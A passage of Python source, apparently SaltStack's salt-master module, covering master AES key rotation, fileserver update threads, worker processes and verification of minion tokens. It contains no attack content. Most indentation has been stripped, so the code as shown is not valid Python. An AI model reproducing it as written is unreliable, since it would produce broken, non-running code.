if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
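    # Illustrative master config options that drive the rotation above (example
    # values only):
    #   publish_session: 86400   # rotate the AES key once a day
    #   ping_on_rotate: True     # ping minions so they pick up the new key quickly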
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
                    'No update function for the %s fileserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
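        # Illustrative shape of the result (assumed example): self.buckets maps an
        # update interval in seconds to an OrderedDict keyed by (backend, update_func),
        # e.g. {60: OrderedDict({('roots', <func>): None}),
        #       30: OrderedDict({('gitfs', <func>): ['remote_a', 'remote_b']})}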
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
        :param dict opts: The salt options dictionary
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
            # hard limit, but raising to anything above the soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
            # Since there are children that have their own ProcessManager, we should allow more time for the kill.
self.process_manager = salt.utils.process.ProcessManager(wait_for_kill=5)
pub_channels = []
log.info('Creating master publisher process')
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.PubServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
pub_channels.append(chan)
log.info('Creating master event publisher process')
self.process_manager.add_process(salt.utils.event.EventPublisher, args=(self.opts,))
if self.opts.get('reactor'):
if isinstance(self.opts['engines'], list):
rine = False
for item in self.opts['engines']:
if 'reactor' in item:
rine = True
break
if not rine:
self.opts['engines'].append({'reactor': {}})
else:
if 'reactor' not in self.opts['engines']:
log.info('Enabling the reactor engine')
self.opts['engines']['reactor'] = {}
salt.engines.start_engines(self.opts, self.process_manager)
# must be after channels
log.info('Creating master maintenance process')
self.process_manager.add_process(Maintenance, args=(self.opts,))
if self.opts.get('event_return'):
log.info('Creating master event return process')
self.process_manager.add_process(salt.utils.event.EventReturn, args=(self.opts,))
ext_procs = self.opts.get('ext_processes', [])
for proc in ext_procs:
log.info('Creating ext_processes process: %s', proc)
try:
mod = '.'.join(proc.split('.')[:-1])
cls = proc.split('.')[-1]
_tmp = __import__(mod, globals(), locals(), [cls], -1)
cls = _tmp.__getattribute__(cls)
self.process_manager.add_process(cls, args=(self.opts,))
except Exception:
log.error('Error creating ext_processes process: %s', proc)
if HAS_HALITE and 'halite' in self.opts:
log.info('Creating master halite process')
self.process_manager.add_process(Halite, args=(self.opts['halite'],))
# TODO: remove, or at least push into the transport stuff (pre-fork probably makes sense there)
if self.opts['con_cache']:
log.info('Creating master concache process')
self.process_manager.add_process(salt.utils.master.ConnectedCache, args=(self.opts,))
# workaround for issue #16315, race condition
log.debug('Sleeping for two seconds to let concache rest')
time.sleep(2)
log.info('Creating master request server process')
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = salt.log.setup.get_multiprocessing_logging_queue()
kwargs['log_queue_level'] = salt.log.setup.get_multiprocessing_logging_level()
kwargs['secrets'] = SMaster.secrets
self.process_manager.add_process(
ReqServer,
args=(self.opts, self.key, self.master_key),
kwargs=kwargs,
name='ReqServer')
self.process_manager.add_process(
FileserverUpdate,
args=(self.opts,))
# Fire up SSDP discovery publisher
if self.opts['discovery']:
if salt.utils.ssdp.SSDPDiscoveryServer.is_available():
self.process_manager.add_process(salt.utils.ssdp.SSDPDiscoveryServer(
port=self.opts['discovery']['port'],
listen_ip=self.opts['interface'],
answer={'mapping': self.opts['discovery'].get('mapping', {})}).run)
else:
log.error('Unable to load SSDP: asynchronous IO is not available.')
if sys.version_info.major == 2:
log.error('You are using Python 2, please install "trollius" module to enable SSDP discovery.')
# Install the SIGINT/SIGTERM handlers if not done so far
if signal.getsignal(signal.SIGINT) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGINT, self._handle_signals)
if signal.getsignal(signal.SIGTERM) is signal.SIG_DFL:
# No custom signal handling was added, install our own
signal.signal(signal.SIGTERM, self._handle_signals)
self.process_manager.run()
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
# escalate the signals to the process manager
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
# kill any remaining processes
self.process_manager.kill_children()
time.sleep(1)
sys.exit(0)
class Halite(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Manage the Halite server
'''
def __init__(self, hopts, **kwargs):
'''
Create a halite instance
:param dict hopts: The halite options
'''
super(Halite, self).__init__(**kwargs)
self.hopts = hopts
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['hopts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'hopts': self.hopts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def run(self):
'''
Fire up halite!
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
halite.start(self.hopts)
class ReqServer(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
Starts up the master request server, minions send results to this
interface.
'''
def __init__(self, opts, key, mkey, secrets=None, **kwargs):
'''
Create a request server
:param dict opts: The salt options dictionary
        :param dict key: The user starting the server and the AES key
        :param dict mkey: The user starting the server and the RSA key
:rtype: ReqServer
:returns: Request server
'''
super(ReqServer, self).__init__(**kwargs)
self.opts = opts
self.master_key = mkey
# Prepare the AES key
self.key = key
self.secrets = secrets
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['key'],
state['mkey'],
secrets=state['secrets'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'key': self.key,
'mkey': self.master_key,
'secrets': self.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe): # pylint: disable=unused-argument
self.destroy(signum)
super(ReqServer, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Binds the reply server
'''
if self.log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(self.log_queue)
if self.log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(self.log_queue_level)
salt.log.setup.setup_multiprocessing_logging(self.log_queue)
if self.secrets is not None:
SMaster.secrets = self.secrets
dfn = os.path.join(self.opts['cachedir'], '.dfn')
if os.path.isfile(dfn):
try:
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
os.remove(dfn)
except os.error:
pass
        # Wait for kill should be less than the parent's ProcessManager.
self.process_manager = salt.utils.process.ProcessManager(name='ReqServer_ProcessManager',
wait_for_kill=1)
req_channels = []
tcp_only = True
for transport, opts in iter_transport_opts(self.opts):
chan = salt.transport.server.ReqServerChannel.factory(opts)
chan.pre_fork(self.process_manager)
req_channels.append(chan)
if transport != 'tcp':
tcp_only = False
kwargs = {}
if salt.utils.platform.is_windows():
kwargs['log_queue'] = self.log_queue
kwargs['log_queue_level'] = self.log_queue_level
# Use one worker thread if only the TCP transport is set up on
# Windows and we are using Python 2. There is load balancer
# support on Windows for the TCP transport when using Python 3.
if tcp_only and six.PY2 and int(self.opts['worker_threads']) != 1:
log.warning('TCP transport supports only 1 worker on Windows '
'when using Python 2.')
self.opts['worker_threads'] = 1
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
for ind in range(int(self.opts['worker_threads'])):
name = 'MWorker-{0}'.format(ind)
self.process_manager.add_process(MWorker,
args=(self.opts,
self.master_key,
self.key,
req_channels,
name),
kwargs=kwargs,
name=name)
self.process_manager.run()
def run(self):
'''
Start up the ReqServer
'''
self.__bind()
def destroy(self, signum=signal.SIGTERM):
if hasattr(self, 'process_manager'):
self.process_manager.stop_restarting()
self.process_manager.send_signal_to_processes(signum)
self.process_manager.kill_children()
def __del__(self):
self.destroy()
class MWorker(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
The worker multiprocess instance to manage the backend operations for the
salt master.
'''
def __init__(self,
opts,
mkey,
key,
req_channels,
name,
**kwargs):
'''
Create a salt master worker process
:param dict opts: The salt options
:param dict mkey: The user running the salt master and the AES key
:param dict key: The user running the salt master and the RSA key
:rtype: MWorker
:return: Master worker
'''
kwargs['name'] = name
self.name = name
super(MWorker, self).__init__(**kwargs)
self.opts = opts
self.req_channels = req_channels
self.mkey = mkey
self.key = key
self.k_mtime = 0
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = time.time()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self._is_child = True
super(MWorker, self).__init__(
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
self.opts = state['opts']
self.req_channels = state['req_channels']
self.mkey = state['mkey']
self.key = state['key']
self.k_mtime = state['k_mtime']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {
'opts': self.opts,
'req_channels': self.req_channels,
'mkey': self.mkey,
'key': self.key,
'k_mtime': self.k_mtime,
'secrets': SMaster.secrets,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _handle_signals(self, signum, sigframe):
for channel in getattr(self, 'req_channels', ()):
channel.close()
super(MWorker, self)._handle_signals(signum, sigframe)
def __bind(self):
'''
Bind to the local port
'''
# using ZMQIOLoop since we *might* need zmq in there
install_zmq()
self.io_loop = ZMQDefaultLoop()
self.io_loop.make_current()
for req_channel in self.req_channels:
req_channel.post_fork(self._handle_payload, io_loop=self.io_loop) # TODO: cleaner? Maybe lazily?
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
# Tornado knows what to do
pass
@tornado.gen.coroutine
def _handle_payload(self, payload):
'''
The _handle_payload method is the key method used to figure out what
needs to be done with communication to the server
Example cleartext payload generated for 'salt myminion test.ping':
{'enc': 'clear',
'load': {'arg': [],
'cmd': 'publish',
'fun': 'test.ping',
'jid': '',
'key': 'alsdkjfa.,maljf-==adflkjadflkjalkjadfadflkajdflkj',
'kwargs': {'show_jid': False, 'show_timeout': False},
'ret': '',
'tgt': 'myminion',
'tgt_type': 'glob',
'user': 'root'}}
        :param dict payload: The payload to route to the appropriate handler
'''
key = payload['enc']
load = payload['load']
ret = {'aes': self._handle_aes,
'clear': self._handle_clear}[key](load)
raise tornado.gen.Return(ret)
def _post_stats(self, start, cmd):
'''
Calculate the master stats and fire events with stat info
'''
end = time.time()
duration = end - start
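        # Running mean: 'runs' has already been incremented by the caller for
        # this invocation, so new_mean = (old_mean * (runs - 1) + duration) / runs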
self.stats[cmd]['mean'] = (self.stats[cmd]['mean'] * (self.stats[cmd]['runs'] - 1) + duration) / self.stats[cmd]['runs']
if end - self.stat_clock > self.opts['master_stats_event_iter']:
# Fire the event with the stats and wipe the tracker
self.aes_funcs.event.fire_event({'time': end - self.stat_clock, 'worker': self.name, 'stats': self.stats}, tagify(self.name, 'stats'))
self.stats = collections.defaultdict(lambda: {'mean': 0, 'runs': 0})
self.stat_clock = end
def _handle_clear(self, load):
'''
Process a cleartext command
:param dict load: Cleartext payload
:return: The result of passing the load to a function in ClearFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
log.trace('Clear payload received with command %s', load['cmd'])
cmd = load['cmd']
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
ret = getattr(self.clear_funcs, cmd)(load), {'fun': 'send_clear'}
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def _handle_aes(self, data):
'''
Process a command sent via an AES key
        :param dict data: The decrypted payload containing the command to run
:return: The result of passing the load to a function in AESFuncs corresponding to
the command specified in the load's 'cmd' key.
'''
if 'cmd' not in data:
log.error('Received malformed command %s', data)
return {}
cmd = data['cmd']
log.trace('AES payload received with command %s', data['cmd'])
if cmd.startswith('__'):
return False
if self.opts['master_stats']:
start = time.time()
self.stats[cmd]['runs'] += 1
def run_func(data):
return self.aes_funcs.run_func(data['cmd'], data)
with StackContext(functools.partial(RequestContext,
{'data': data,
'opts': self.opts})):
ret = run_func(data)
if self.opts['master_stats']:
self._post_stats(start, cmd)
return ret
def run(self):
'''
Start a Master Worker
'''
salt.utils.process.appendproctitle(self.name)
self.clear_funcs = ClearFuncs(
self.opts,
self.key,
)
self.aes_funcs = AESFuncs(self.opts)
salt.utils.crypt.reinit_crypto()
self.__bind()
# TODO: rename? No longer tied to "AES", just "encrypted" or "private" requests
class AESFuncs(object):
'''
Set up functions that are available when the load is encrypted with AES
'''
# The AES Functions:
#
def __init__(self, opts):
'''
Create a new AESFuncs
:param dict opts: The salt options
:rtype: AESFuncs
:returns: Instance for handling AES operations
'''
self.opts = opts
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
self.serial = salt.payload.Serial(opts)
self.ckminions = salt.utils.minions.CkMinions(opts)
# Make a client
self.local = salt.client.get_local_client(self.opts['conf_file'])
# Create the master minion to access the external job cache
self.mminion = salt.minion.MasterMinion(
self.opts,
states=False,
rend=False,
ignore_config_errors=True
)
self.__setup_fileserver()
self.masterapi = salt.daemons.masterapi.RemoteFuncs(opts)
def __setup_fileserver(self):
'''
Set the local file objects from the file server interface
'''
# Avoid circular import
import salt.fileserver
self.fs_ = salt.fileserver.Fileserver(self.opts)
self._serve_file = self.fs_.serve_file
self._file_find = self.fs_._find_file
self._file_hash = self.fs_.file_hash
self._file_hash_and_stat = self.fs_.file_hash_and_stat
self._file_list = self.fs_.file_list
self._file_list_emptydirs = self.fs_.file_list_emptydirs
self._dir_list = self.fs_.dir_list
self._symlink_list = self.fs_.symlink_list
self._file_envs = self.fs_.file_envs
def __verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
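        For reference, the token is produced on the minion side roughly like
        this (a sketch; it assumes salt.crypt.private_encrypt, the counterpart
        of the public_decrypt call used below, and minion_rsa_key stands for
        the minion's loaded RSA key object):
        .. code-block:: python
            import salt.crypt
            tok = salt.crypt.private_encrypt(minion_rsa_key, b'salt')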
'''
if not salt.utils.verify.valid_id(self.opts, id_):
return False
pub_path = os.path.join(self.opts['pki_dir'], 'minions', id_)
try:
pub = salt.crypt.get_rsa_pub_key(pub_path)
except (IOError, OSError):
log.warning(
'Salt minion claiming to be %s attempted to communicate with '
'master, but key could not be read and verification was denied.',
id_
)
return False
        except (ValueError, IndexError, TypeError) as err:
            log.error('Unable to load public key "%s": %s', pub_path, err)
            return False
try:
if salt.crypt.public_decrypt(pub, token) == b'salt':
return True
except ValueError as err:
log.error('Unable to decrypt token: %s', err)
log.error(
'Salt minion claiming to be %s has attempted to communicate with '
'the master and could not be verified', id_
)
return False
def verify_minion(self, id_, token):
'''
Take a minion id and a string signed with the minion private key
The string needs to verify as 'salt' with the minion public key
:param str id_: A minion ID
:param str token: A string signed with the minion private key
:rtype: bool
:return: Boolean indicating whether or not the token can be verified.
'''
return self.__verify_minion(id_, token)
def __verify_minion_publish(self, clear_load):
'''
        Verify that the passed information authorizes a minion to execute
:param dict clear_load: A publication load from a minion
:rtype: bool
:return: A boolean indicating if the minion is allowed to publish the command in the load
'''
# Verify that the load is valid
if 'peer' not in self.opts:
return False
if not isinstance(self.opts['peer'], dict):
return False
if any(key not in clear_load for key in ('fun', 'arg', 'tgt', 'ret', 'tok', 'id')):
return False
# If the command will make a recursive publish don't run
if clear_load['fun'].startswith('publish.'):
return False
# Check the permissions for this minion
if not self.__verify_minion(clear_load['id'], clear_load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning(
'Minion id %s is not who it says it is and is attempting '
'to issue a peer command', clear_load['id']
)
return False
clear_load.pop('tok')
perms = []
for match in self.opts['peer']:
if re.match(match, clear_load['id']):
# This is the list of funcs/modules!
if isinstance(self.opts['peer'][match], list):
perms.extend(self.opts['peer'][match])
if ',' in clear_load['fun']:
# 'arg': [['cat', '/proc/cpuinfo'], [], ['foo']]
clear_load['fun'] = clear_load['fun'].split(',')
arg_ = []
for arg in clear_load['arg']:
arg_.append(arg.split())
clear_load['arg'] = arg_
# finally, check the auth of the load
return self.ckminions.auth_check(
perms,
clear_load['fun'],
clear_load['arg'],
clear_load['tgt'],
clear_load.get('tgt_type', 'glob'),
publish_validate=True)
def __verify_load(self, load, verify_keys):
'''
A utility function to perform common verification steps.
:param dict load: A payload received from a minion
:param list verify_keys: A list of strings that should be present in a
given load
        :rtype: bool or dict
:return: The original load (except for the token) if the load can be
verified. False if the load is invalid.
'''
if any(key not in load for key in verify_keys):
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return False
if 'tok' in load:
load.pop('tok')
return load
def _master_tops(self, load):
'''
Return the results from an external node classifier if one is
specified
:param dict load: A payload received from a minion
:return: The results from an external node classifier
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
return self.masterapi._master_tops(load, skip_verify=True)
# Needed so older minions can request master_tops
_ext_nodes = _master_tops
def _master_opts(self, load):
'''
Return the master options to the minion
:param dict load: A payload received from a minion
:rtype: dict
:return: The master options
'''
mopts = {}
file_roots = {}
envs = self._file_envs()
for saltenv in envs:
if saltenv not in file_roots:
file_roots[saltenv] = []
mopts['file_roots'] = file_roots
mopts['top_file_merging_strategy'] = self.opts['top_file_merging_strategy']
mopts['env_order'] = self.opts['env_order']
mopts['default_top'] = self.opts['default_top']
if load.get('env_only'):
return mopts
mopts['renderer'] = self.opts['renderer']
mopts['failhard'] = self.opts['failhard']
mopts['state_top'] = self.opts['state_top']
mopts['state_top_saltenv'] = self.opts['state_top_saltenv']
mopts['nodegroups'] = self.opts['nodegroups']
mopts['state_auto_order'] = self.opts['state_auto_order']
mopts['state_events'] = self.opts['state_events']
mopts['state_aggregate'] = self.opts['state_aggregate']
mopts['jinja_env'] = self.opts['jinja_env']
mopts['jinja_sls_env'] = self.opts['jinja_sls_env']
mopts['jinja_lstrip_blocks'] = self.opts['jinja_lstrip_blocks']
mopts['jinja_trim_blocks'] = self.opts['jinja_trim_blocks']
return mopts
def _mine_get(self, load):
'''
Gathers the data from the specified minions' mine
:param dict load: A payload received from a minion
:rtype: dict
:return: Mine data from the specified minions
'''
load = self.__verify_load(load, ('id', 'tgt', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_get(load, skip_verify=True)
def _mine(self, load):
'''
Store the mine data
:param dict load: A payload received from a minion
:rtype: bool
:return: True if the data has been stored in the mine
'''
load = self.__verify_load(load, ('id', 'data', 'tok'))
if load is False:
return {}
return self.masterapi._mine(load, skip_verify=True)
def _mine_delete(self, load):
'''
Allow the minion to delete a specific function from its own mine
:param dict load: A payload received from a minion
:rtype: bool
:return: Boolean indicating whether or not the given function was deleted from the mine
'''
load = self.__verify_load(load, ('id', 'fun', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_delete(load)
def _mine_flush(self, load):
'''
Allow the minion to delete all of its own mine contents
:param dict load: A payload received from a minion
'''
load = self.__verify_load(load, ('id', 'tok'))
if load is False:
return {}
else:
return self.masterapi._mine_flush(load, skip_verify=True)
def _file_recv(self, load):
'''
        Allow minions to send files to the master; the files are stored in the
        master file cache
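        A sketch of what a pushed-file load contains, based on the keys this
        method checks below (values are illustrative only):
        .. code-block:: python
            {'id': 'minion1',
             'path': ['pushed', 'some', 'file.txt'],
             'loc': 0,
             'tok': '<token signed with the minion key>',
             'data': '<file chunk>'}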
'''
if any(key not in load for key in ('id', 'path', 'loc')):
return False
if not isinstance(load['path'], list):
return False
if not self.opts['file_recv']:
return False
if not salt.utils.verify.valid_id(self.opts, load['id']):
return False
if 'loc' in load and load['loc'] < 0:
log.error('Invalid file pointer: load[loc] < 0')
return False
if len(load['data']) + load.get('loc', 0) > self.opts['file_recv_max_size'] * 0x100000:
log.error(
'file_recv_max_size limit of %d MB exceeded! %s will be '
'truncated. To successfully push this file, adjust '
'file_recv_max_size to an integer (in MB) large enough to '
'accommodate it.', self.opts['file_recv_max_size'], load['path']
)
return False
if 'tok' not in load:
log.error(
'Received incomplete call from %s for \'%s\', missing \'%s\'',
load['id'], inspect_stack()['co_name'], 'tok'
)
return False
if not self.__verify_minion(load['id'], load['tok']):
# The minion is not who it says it is!
# We don't want to listen to it!
log.warning('Minion id %s is not who it says it is!', load['id'])
return {}
load.pop('tok')
# Join path
